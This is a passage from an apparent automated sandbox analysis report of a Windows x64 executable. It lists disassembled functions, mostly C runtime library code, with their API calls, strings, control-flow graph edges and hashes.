                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filelstrcat$lstrcpy$Directory$wsprintf$Currentlstrlen$DeleteMovePointer_lreadfreemalloc$CreateProcessRemove_lcreat$AttributesOpenPathSleepTempToken_lclose_lopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1722154105-0
                                                                                                                    • Opcode ID: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
                                                                                                                    • Instruction ID: 3288bed726501db5ea6726368a0595bde53ba482a98c252ae083cf112146414f
                                                                                                                    • Opcode Fuzzy Hash: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
                                                                                                                    • Instruction Fuzzy Hash: 5F211035A58747C2EB809B31A8112BA23B2AF94B44F894035D50FCF551DF3CE849C709

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF668853D40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 566 7ff668853d40-7ff668853d7c call 7ff668853d14 569 7ff668853d82-7ff668853d8d call 7ff668856180 566->569 570 7ff668853f70-7ff668853f9c call 7ff668852680 566->570 575 7ff668853f08-7ff668853f19 GetStdHandle 569->575 576 7ff668853d93-7ff668853d9d call 7ff668856180 569->576 575->570 577 7ff668853f1b-7ff668853f1f 575->577 582 7ff668853dac-7ff668853db2 576->582 583 7ff668853d9f-7ff668853da6 576->583 577->570 579 7ff668853f21-7ff668853f23 577->579 581 7ff668853f28-7ff668853f30 579->581 585 7ff668853f32-7ff668853f41 581->585 586 7ff668853f43-7ff668853f6a call 7ff668855cf0 WriteFile 581->586 582->570 584 7ff668853db8-7ff668853ddb call 7ff668856114 582->584 583->575 583->582 591 7ff668853ef5-7ff668853f07 call 7ff66885338c 584->591 592 7ff668853de1-7ff668853e05 GetModuleFileNameW 584->592 585->581 585->586 586->570 591->575 593 7ff668853e07-7ff668853e1a call 7ff668856114 592->593 594 7ff668853e31-7ff668853e40 call 7ff6688560f8 592->594 593->594 601 7ff668853e1c-7ff668853e30 call 7ff66885338c 593->601 602 7ff668853e89-7ff668853e9d call 7ff668855fa0 594->602 603 7ff668853e42-7ff668853e72 call 7ff6688560f8 call 7ff668856028 594->603 601->594 611 7ff668853e9f-7ff668853eaf call 7ff668855fa0 602->611 612 7ff668853ee0-7ff668853ef4 call 7ff66885338c 602->612 603->602 616 7ff668853e74-7ff668853e88 call 7ff66885338c 603->616 620 7ff668853ecb-7ff668853edf call 7ff66885338c 611->620 621 7ff668853eb1-7ff668853ec6 call 7ff668855d98 611->621 612->591 616->602 620->612 621->570
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                    • API String ID: 2183313154-4022980321
                                                                                                                    • Opcode ID: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
                                                                                                                    • Instruction ID: 8b4aa1f400126399a1a2f03c991b3564c8df0922cbe490774a1129542ad29431
                                                                                                                    • Opcode Fuzzy Hash: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
                                                                                                                    • Instruction Fuzzy Hash: 6F51A035A08742C1FBA4D735A4156BA63B1AF8A784F44013DEE5FCBA95CF3CE905870A
                                                                                                                    Function 00007FF668852680 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3778485334-0
                                                                                                                    • Opcode ID: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
                                                                                                                    • Instruction ID: 5692748998e20549c3658bed22593a17a61b02adca2d3b4252ac32e799ec2936
                                                                                                                    • Opcode Fuzzy Hash: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
                                                                                                                    • Instruction Fuzzy Hash: 3631D235919B42C5EB909B75F84036A73B4FF84754F50403ADA8E8AB65DF3CE494CB0A
                                                                                                                    Function 00007FF668853240 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1239891234-0
                                                                                                                    • Opcode ID: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
                                                                                                                    • Instruction ID: 373fd2d73b9a024e53075b5acf139302df9b73a3af04956df3b9303354069fd9
                                                                                                                    • Opcode Fuzzy Hash: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
                                                                                                                    • Instruction Fuzzy Hash: 85314132618B82C6DBA0CB35E8406AE73B4FF85754F500139EA9E87A95DF3CD545CB05
                                                                                                                    Function 00007FF668851908 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                    • String ID: Advapi32.dll$ConvertSidToStringSidA
                                                                                                                    • API String ID: 145871493-1798845326
                                                                                                                    • Opcode ID: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
                                                                                                                    • Instruction ID: 7ee0df3b6d142b2478d30ad18f9525dcc0a3dd7871417d35abcbb067763b720f
                                                                                                                    • Opcode Fuzzy Hash: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
                                                                                                                    • Instruction Fuzzy Hash: 4FF01D35B19B41C5EA949F76B48012A62B0AF48BD0F888139EE4F9BB54EE3CE8458615
                                                                                                                    Function 00007FF668854D20 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1445889803-0
                                                                                                                    • Opcode ID: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
                                                                                                                    • Instruction ID: e8682f92c825aa77f40a48db188569d772728bb25f417cfc0122c60997015f00
                                                                                                                    • Opcode Fuzzy Hash: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
                                                                                                                    • Instruction Fuzzy Hash: C5015E31669B01C1EBD08F32E8402666371FF49B91F442639EE5F8BBA4DE3CD8998705
                                                                                                                    Function 00007FF6688542FC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
                                                                                                                    • Instruction ID: 1d4ae61e6f3dbd5305bd524084fa6ce55014a87b75d5a862051061d39780a3b1
                                                                                                                    • Opcode Fuzzy Hash: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
                                                                                                                    • Instruction Fuzzy Hash: B7B09224EA9542C1D684AB319C8506122B06F98301FC10435C00EC9120DE5C91AB8705
                                                                                                                    Function 00007FF668856424 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 307 7ff668856424-7ff668856427 308 7ff66885642d-7ff668856810 call 7ff668852a80 * 86 307->308 309 7ff668856811 307->309 308->309
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1012874770-0
                                                                                                                    • Opcode ID: 38c5fe463394c08e12a9a6354ee852dc3d8d4bc07c49ae58647bb7e9c07ea56b
                                                                                                                    • Instruction ID: 900a473126b4cbf7e56b13f01ef7eda1b18d2b6bb77608711368990b314e975d
                                                                                                                    • Opcode Fuzzy Hash: 38c5fe463394c08e12a9a6354ee852dc3d8d4bc07c49ae58647bb7e9c07ea56b
                                                                                                                    • Instruction Fuzzy Hash: AFA1643261A647C1EAA2AA31D9952FD2330AF88B44F044136DA4F8E1A7CF18D84583D6
                                                                                                                    Function 00007FF668855D98 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855DDD
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855DF9
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E0B
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E22
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E2B
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E42
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E4B
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E62
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E6B
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E8A
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E93
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855EC6
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855ED6
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855F2C
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855F4D
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855F67
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                    • API String ID: 2643518689-564504941
                                                                                                                    • Opcode ID: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
                                                                                                                    • Instruction ID: 881eab4b2f17b47b6a1600f314cdeaa5a50ebdcb04d499a3eb788fb63d0f4a48
                                                                                                                    • Opcode Fuzzy Hash: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
                                                                                                                    • Instruction Fuzzy Hash: E551F531A6AB03C1EED59B71B81417A23B0AF48B85F44153EDD0FCA7A4EE3CB545830A
                                                                                                                    Function 00007FF66885517C Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 518839503-0
                                                                                                                    • Opcode ID: d6fa53e174e6b918517e515ba8aa7a722c480d1c0c30cd535f337a27a34034e8
                                                                                                                    • Instruction ID: 012d5e8c6054362d76f30addde48182a6b0806a512cb43ead9c169bb97bfa2b8
                                                                                                                    • Opcode Fuzzy Hash: d6fa53e174e6b918517e515ba8aa7a722c480d1c0c30cd535f337a27a34034e8
                                                                                                                    • Instruction Fuzzy Hash: 1141CB32E0A742C5EEE5DF71D5503B923B1AF88B94F184439DA0F8E295CF6CA491835A
                                                                                                                    Function 00007FF66885698C Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1080698880-0
                                                                                                                    • Opcode ID: 06b358e6a8dfdad4ae1c8f4e6ae3763ba8e01f825429bf13183ac54123346ef6
                                                                                                                    • Instruction ID: af39556a2bdc2122162b28e7a3a9fbff768f06966a3e56824c56217104d66648
                                                                                                                    • Opcode Fuzzy Hash: 06b358e6a8dfdad4ae1c8f4e6ae3763ba8e01f825429bf13183ac54123346ef6
                                                                                                                    • Instruction Fuzzy Hash: 1E817F32A08782C6EBA58F35984016A77B5FF487A4F544239DB5E8BBD4DF3CE8418709
                                                                                                                    Function 00007FF668852E54 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 113790786-0
                                                                                                                    • Opcode ID: 58324cbb415507639f68647bb86c879729a4a0b96829e5bcb854d5795d216430
                                                                                                                    • Instruction ID: 39a62744ab07442e6b1425c9bde0f83bc5acafe73755d2e0ba73bf282e482ee2
                                                                                                                    • Opcode Fuzzy Hash: 58324cbb415507639f68647bb86c879729a4a0b96829e5bcb854d5795d216430
                                                                                                                    • Instruction Fuzzy Hash: 2F213D31E58742C2F6E5AB70B40577A6275AF89784F44503DE54FCE6C6CF3CA840870A
                                                                                                                    Function 00007FF668854A4C Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3473179607-0
                                                                                                                    • Opcode ID: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
                                                                                                                    • Instruction ID: 5a5fba6143ae3aac150dcb202f529f1145dcf7588bec14f384c76323d5c24768
                                                                                                                    • Opcode Fuzzy Hash: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
                                                                                                                    • Instruction Fuzzy Hash: 2C816FB1A09B82C5EBA48F35955432967B0FF84B64F544339CA7F8A2D4DF38E465C30A
                                                                                                                    Function 00007FF66885237C Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3411037476-0
                                                                                                                    • Opcode ID: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
                                                                                                                    • Instruction ID: 2cbdcba4301a80b18d0247ebd9156b01af8a2baa2bf481a4f188a3086f909740
                                                                                                                    • Opcode Fuzzy Hash: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
                                                                                                                    • Instruction Fuzzy Hash: 8C413C31AA9B42C1EAD09B31F84413962B5BF88B84F14443DE98FCB7A5DF7CE455870A
                                                                                                                    Function 00007FF668855A08 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3894533514-0
                                                                                                                    • Opcode ID: 286a05b5a7774a520a07d95891b3d4818651d0f49d1d563932e00a541e4ffacf
                                                                                                                    • Instruction ID: b98eb95cc9d3c3991fda18a50468971c8860a2ab6adc068b1025de454ff65af9
                                                                                                                    • Opcode Fuzzy Hash: 286a05b5a7774a520a07d95891b3d4818651d0f49d1d563932e00a541e4ffacf
                                                                                                                    • Instruction Fuzzy Hash: A9518A36A08742C6E6A49B35A4502797AB1BF84B54F14413ADA5F8B396CF7CE441C70B
                                                                                                                    Function 00007FF668854958 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
